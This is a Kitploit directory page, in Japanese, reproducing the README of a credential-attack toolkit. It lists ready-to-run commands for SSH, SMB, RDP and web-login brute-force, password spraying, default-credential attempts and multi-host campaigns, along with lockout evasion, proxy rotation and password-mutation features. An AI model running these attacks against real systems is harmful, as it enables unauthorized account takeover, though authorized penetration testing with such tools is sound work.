Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
credential-attacks-toolkit — 認可されたセキュリティテストのための完全なクレデンシャル攻撃スイート — SSH、FTP、Webログイン、ブルートフォース、辞書攻撃 | Kitploit
ツール/GitHubGitHub/amibhai/credential-attacks-toolkit
偵察パスワード攻撃ペネトレーションテストレッドチーミング
GitHubamibhai/credential-attacks-toolkit

credential-attacks-toolkit

認可されたセキュリティテストのための完全なクレデンシャル攻撃スイート — SSH、FTP、Webログイン、ブルートフォース、辞書攻撃

リポジトリを見る
12ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CredAttack — クレデンシャルアタックツールキット

リリース Python プロトコル テスト ライセンス

⚠️ 法的通知 — 認可されたセキュリティテストのみ。
このツールを、所有していない、または明示的な書面による許可を得ていないシステムに対して使用することは、米国のComputer Fraud and Abuse Act、英国のComputer Misuse Act、および世界各国の同等の法律に違反します。SECURITY.mdを参照してください。


目次

  • CredAttackとは?
  • 攻撃モード
  • サポートされているプロトコル
  • アーキテクチャ
  • クイックスタート
  • インストール
  • CLIリファレンス
  • パスワードミューテーションエンジン
  • デフォルトクレデンシャルデータベース
  • プロキシローテーション
  • HTMLレポート
  • 設定と環境変数
  • Docker
  • テスト
  • プロジェクト構成
  • コントリビューション

CredAttackとは?

CredAttackは、認可された侵入テスト業務のためのモジュール式でプロダクションレベルのクレデンシャルテストスイートです。クレデンシャルアタックのライフサイクル全体をカバーします:

フェーズCredAttackの機能
偵察デフォルトクレデンシャルDB(200+ペア)、スマートなユーザー名由来パターン生成
攻撃17のプロトコルアタッカー、6つの攻撃モード、マルチターゲットキャンペーン

攻撃モード


サポートされているプロトコル


アーキテクチャ

root@kitploit:~
credattack.py          ← CLI (Typer) — 8 attack-mode subcommands
│
├── credattack/core/
│   ├── config.py      ← Pydantic v2 Settings, CREDATTACK_* env-var overrides
│   ├── engine.py      ← AttackEngine (ThreadPoolExecutor + Rich progress UI)
│   ├── lockout.py     ← LockoutDetector (sliding-window, thread-safe)
│   ├── proxy.py       ← ProxyRotator (round-robin, health-check, demotion)
│   ├── mutator.py     ← PasswordMutator (leet, seasonal, suffix, keyboard-walk…)
│   ├── result.py      ← AttemptResult + SessionReport dataclasses
│   ├── report.py      ← Jinja2 HTML report generator
│   └── logger.py      ← Rich logging + JSONL audit writer
│
├── credattack/protocols/
│   └── *.py           ← 18 ProtocolAttacker implementations
│
├── credattack/data/
│   ├── default_creds.json    ← 200+ real default credential pairs
│   ├── smart_patterns.json   ← 140+ enterprise password templates
│   └── wordlists/            ← Per-service default password lists
│
└── tests/             ← 50+ pytest tests (unit + protocol mocks)

クイックスタート

root@kitploit:~
# Clone and set up
git clone https://github.com/amibhai/credential-attacks-toolkit.git
cd credential-attacks-toolkit
python -m venv .venv && source .venv/bin/activate   # Windows: .venv\Scripts\activate
pip install -r requirements.txt

# Check version
python credattack.py --version

# Dry-run (no connections made — verify your word lists)
python credattack.py ssh -t 192.168.1.100 -u admin -P wordlists/common_passwords.txt --dry-run

# Real SSH dictionary attack
python credattack.py ssh -t 192.168.1.100 -u admin -P /path/to/rockyou.txt

# Password spray (rate-limited, lockout-safe)
python credattack.py spray -t 192.168.1.100 --protocol ssh -U users.txt -p "Summer2024!" --delay 30

# Smart mode — generate patterns from username + company
python credattack.py smart -t 192.168.1.100 --protocol ssh -u john.doe --company ACME

# Try service defaults
python credattack.py defaults -t 192.168.1.100 --protocol mysql

# Multi-target campaign
python credattack.py multi --targets hosts.txt --protocol ssh -U users.txt -P passes.txt

インストール

オプションA — pip + virtualenv(推奨)

root@kitploit:~
python -m venv .venv
source .venv/bin/activate        # Windows: .venv\Scripts\activate
pip install --upgrade pip
pip install -r requirements.txt

オプションB — Makefileショートカット

root@kitploit:~
make install      # core deps
make install-dev  # + pytest-cov, ruff, mypy

オプションC — Docker

root@kitploit:~
docker build -t credattack -f docker/Dockerfile .
docker run --rm credattack --help

# Mount your wordlists and collect output
docker run --rm \
  -v $(pwd)/wordlists:/app/wordlists:ro \
  -v $(pwd)/output:/app/output \
  credattack ssh -t 192.168.1.100 -u admin -P wordlists/common_passwords.txt

CLIリファレンス

グローバルオプション

root@kitploit:~
python credattack.py [OPTIONS] COMMAND [ARGS]...

Options:
  -V, --version    Show version and exit.
  --help           Show help.

共通フラグ(すべてのプロトコルコマンドで利用可能)

サブコマンド

root@kitploit:~
# Protocol-specific (each maps to a dedicated attacker)
python credattack.py ssh|ftp|smb|rdp|smtp|pop3|imap|mysql|mssql|redis|mongodb|winrm|ldap|telnet|vnc \
  -t HOST -u USER -P passes.txt

# HTTP (form / basic / digest)
python credattack.py http -t http://target/login --mode form \
  --form-user-field username --form-pass-field password --success-string "Dashboard"

# Spray — single password, many users, long delay
python credattack.py spray -t HOST --protocol ssh -U users.txt -p "Password1" --delay 30

# Combo — cartesian product users × passwords
python credattack.py combo -t HOST --protocol smb -U users.txt -P passes.txt

# Smart — OSINT-derived generation
python credattack.py smart -t HOST --protocol ssh -u firstname.lastname --company TargetCorp

# Defaults — try vendor default credentials
python credattack.py defaults -t HOST --protocol mysql

# Multi — same attack across multiple hosts
python credattack.py multi --targets hosts.txt --protocol ssh -U users.txt -P passes.txt

# Full — all protocols in sequence
python credattack.py full -t HOST -U users.txt -P passes.txt

パスワードミューテーションエンジン

credattack/core/mutator.pyのPasswordMutatorは、合成可能な戦略をサポートしています:

root@kitploit:~
from credattack.core.mutator import PasswordMutator

m = PasswordMutator(max_mutations=5000)

# All strategies combined
for pw in m.smart_generate("john.doe", company="ACME"):
    print(pw)

# Just seasonal patterns
for pw in m.seasonal_patterns(company="Contoso"):
    print(pw)

デフォルトクレデンシャルデータベース

credattack/data/default_creds.jsonには 200以上の実際のデフォルトクレデンシャルペア が含まれています(対象ベンダー):

Cisco · F5 · Juniper · Palo Alto · VMware · Jenkins · GitLab · Tomcat · WordPress · MySQL · MSSQL · Redis · MongoDB · PostgreSQL · Elasticsearch · RabbitMQ · Splunk · Nagios · Zabbix · pfSense · MikroTik · Huawei · HP iLO · Dell iDRAC · IPMI

root@kitploit:~
# See all defaults for a service
python credattack.py defaults -t HOST --protocol mysql --dry-run

# Run against target
python credattack.py defaults -t 10.0.0.1 --protocol ssh

プロキシローテーション

プロキシファイル(1行に1プロキシ、host:port形式)を渡します:

root@kitploit:~
# proxies.txt
192.168.1.10:1080
192.168.1.11:1080
socks5://10.0.0.5:9050
root@kitploit:~
python credattack.py ssh -t TARGET -u admin -P passes.txt --proxy-file proxies.txt

ProxyRotatorは起動時にヘルスチェックを実行し、障害率のしきい値を超えたプロキシを降格します。停止したプロキシは自動的に除外されます。


HTMLレポート

ドライラン以外の攻撃のたびに、./output/ディレクトリにHTMLレポートが自動生成されます:

  • 統計カード:総試行数、成功率、所要時間、試行/秒
  • 発見クレデンシャルテーブル:ホスト · プロトコル · ユーザー名 · パスワード(クリップボードにコピー可能)
  • ダークテーマのJinja2テンプレート
root@kitploit:~
# Open after a run
start output/report_*.html      # Windows
open  output/report_*.html      # macOS

設定と環境変数

credattack/core/config.py内のすべての設定は、CREDATTACK_*環境変数で上書きできます:

root@kitploit:~
export CREDATTACK_THREADS=20
export CREDATTACK_TIMEOUT=3.0
export CREDATTACK_DELAY=1.0
export CREDATTACK_JITTER=0.5
export CREDATTACK_LOCKOUT_THRESHOLD=3
export CREDATTACK_VERBOSITY=2

または、CLIレベルで標準フラグ(--threads、--timeoutなど)を使用しても上書きできます。


Docker

root@kitploit:~
# Build image
docker build -t credattack -f docker/Dockerfile .

# Run with Docker Compose
cd docker
docker compose run credattack ssh -t 192.168.1.100 -u admin -P /app/wordlists/common_passwords.txt

# Set config via environment
docker run --rm \
  -e CREDATTACK_THREADS=20 \
  -e CREDATTACK_TIMEOUT=3 \
  -v $(pwd)/output:/app/output \
  credattack defaults -t 10.0.0.1 --protocol mysql

テスト

root@kitploit:~
# Run all tests
pytest -q

# With coverage
pytest --cov=credattack --cov-report=term-missing -q

# Makefile shortcut
make test-cov

現在のスイート:50以上のテスト をカバー:


ワードリスト

⚠️ バンドルされている wordlists/ ファイルは最小限のスモークテスト用スタブです。実際の評価には独自のものを使用してください。

推奨ソース

root@kitploit:~
# Use any external wordlist
python credattack.py ssh -t TARGET -u admin -P /opt/wordlists/rockyou.txt

プロジェクト構成

root@kitploit:~
credential-attacks-toolkit/
├── credattack.py               # CLI entrypoint (Typer)
├── pyproject.toml              # PEP 517/518 build & tool config
├── requirements.txt            # Runtime deps
├── Makefile                    # Developer shortcuts
├── VERSION                     # Single source of version truth
├── CHANGELOG.md
├── SECURITY.md
├── .github/
│   └── workflows/ci.yml        # GitHub Actions: lint + test matrix + mypy
├── docker/
│   ├── Dockerfile
│   └── docker-compose.yml
├── credattack/
│   ├── core/
│   │   ├── config.py           # Pydantic v2 Settings
│   │   ├── engine.py           # AttackEngine (ThreadPoolExecutor)
│   │   ├── lockout.py          # LockoutDetector (sliding window)
│   │   ├── proxy.py            # ProxyRotator
│   │   ├── mutator.py          # PasswordMutator
│   │   ├── result.py           # AttemptResult, SessionReport
│   │   ├── report.py           # HTML report generator
│   │   └── logger.py           # Rich logger + JSONL writer
│   ├── protocols/              # 18 ProtocolAttacker implementations
│   │   └── base.py             # Abstract ProtocolAttacker
│   └── data/
│       ├── default_creds.json  # 200+ vendor defaults
│       ├── smart_patterns.json # 140+ enterprise templates
│       └── wordlists/          # Per-service starter lists
├── tests/
│   ├── conftest.py             # Shared fixtures
│   ├── test_lockout.py
│   ├── test_mutator.py
│   ├── test_mutator_extended.py
│   ├── test_proxy.py
│   ├── test_result.py
│   ├── test_protocols_ssh.py
│   ├── test_protocols_ftp.py
│   └── test_protocols_http.py
├── wordlists/                  # Minimal smoke-test stubs
└── output/                     # Generated logs & reports (git-ignored)

攻撃成功率(参考値)


コントリビューション

CONTRIBUTING.mdを参照してください。
大規模なPRを送信する前に、まずIssueを開いてください。
すべてのコントリビューションは、SECURITY.mdの倫理的使用ポリシーに従わなければなりません。


責任を持って使用してください。倫理的にテストしてください。合法であることを守ってください。

ツールをダウンロード
回避ロックアウト検出、設定可能なレート制限、ジッター、プロキシローテーション
レポートJSONL監査ログ、Jinja2 HTMLレポート、発見クレデンシャルのバナー+ファイルダンプ
モードコマンド説明
辞書ssh, ftp, smb, …単一ユーザーに対するワードリスト
スプレーsprayユーザーリストに対して1つのパスワード(ロックアウト回避)
コンボcomboすべてのユーザー × すべてのパスワード
スマートsmartユーザー名/企業由来のパターン生成
デフォルトdefaults200以上の既知のサービスのデフォルトを試行
マルチターゲットmultiホストリストに対して同じ攻撃
フルパイプラインfullすべてのプロトコル、1つのレポート
#プロトコルモジュールデフォルトポート備考
1SSHssh.py22paramiko、鍵/パスワード認証
2FTPftp.py21アクティブモードとパッシブモード
3HTTPフォームhttp_form.py80/443自動CSRFトークン検出
4HTTP Basichttp_basic.py80RFC 7617
5HTTP Digesthttp_digest.py80RFC 7616
6SMBsmb.py445impacket、NTLM
7RDPrdp.py3389impacket NLA
8SMTPsmtp.py587STARTTLS
9POP3pop3.py110APOP対応
10IMAPimap.py143STARTTLS
11MySQLmysql.py3306mysql-connector-python
12MSSQLmssql.py1433pymssql
13Redisredis_proto.py6379AUTHコマンド
14MongoDBmongodb.py27017pymongo
15WinRMwinrm.py5985NTLM、pywinrm
16LDAPldap_proto.py389ldap3、rootDSE自動検出
17Telnettelnet.py23raw TCP
18VNCvnc.py5900Raw DESチャレンジレスポンス
フラグ省略形デフォルト説明
--target-t—ターゲットホスト/IP
--port0(プロトコルデフォルト)TCPポートの上書き
--username-u—単一のユーザー名
--user-file-U—改行区切りのユーザー名ファイル
--pass-file-P—改行区切りのパスワードファイル
--password-p2—単一のパスワード
--threads-n10同時ワーカー数
--timeout-T5.01試行あたりのタイムアウト(秒)
--delay-d0.0試行間の固定遅延(秒)
--jitter0.0最大ランダムジッター(秒)
--stop-on-firstTrue最初のヒットでユーザーごとに停止
--proxy-fileNoneHTTP/SOCKS5プロキシリスト
--output-dir-o./output結果出力ディレクトリ
--verbosity-v1ログレベル(0-3)
--dry-runFalse接続せずにペアをカウント
戦略メソッド出力例
Leet話法leet_speak(word)p@ssw0rd、p455w0rd
大文字化capitalise_variants(word)PASSWORD、Password、pAsSwOrD
サフィックスsuffix_append(word)password123、password@2025
プレフィックスprefix_append(word)!password、mypassword
キーボードウォークkeyboard_walk(word)qassword(a→q)
ユーザー名パターンusername_patterns(user, company)john123、Doe1!、ACME2024!
季節パターン(v1.1)seasonal_patterns(company)Summer2024!、Winter25
特殊文字ラップ(v1.1)special_char_wrap(word)!@Password、Password!@
組み合わせcombine(word, strategies)上記の任意の組み合わせを連鎖
スマート(オールインワン)smart_generate(user, company)重複排除、上限付きストリーム
領域テスト
ロックアウト検出(スライディングウィンドウ、スレッドセーフ)test_lockout.py
パスワードミューテーター戦略test_mutator.py
新しいミューテーター戦略(季節、特殊文字)test_mutator_extended.py
プロキシローテーター(ヘルスチェック、降格)test_proxy.py
Result & SessionReportデータクラスtest_result.py
SSHプロトコルモックtest_protocols_ssh.py
FTPプロトコルモックtest_protocols_ftp.py
HTTP Basic & Digestモックtest_protocols_http.py
ワードリストサイズ最適な用途
rockyou.txt~14 M一般的な辞書攻撃
SecLists/Passwords/様々プロトコル固有
kaonashi.txt~64 M高度なカバレッジ
OSINT派生可変標的型攻撃
パスワードタイプ辞書攻撃スマートモードスプレー(一般的なパスワード)
4文字~90%~95%~60%
6文字~65%~75%~25%
8文字混合~15%~25%~5%
10文字以上複雑<5%<5%<1%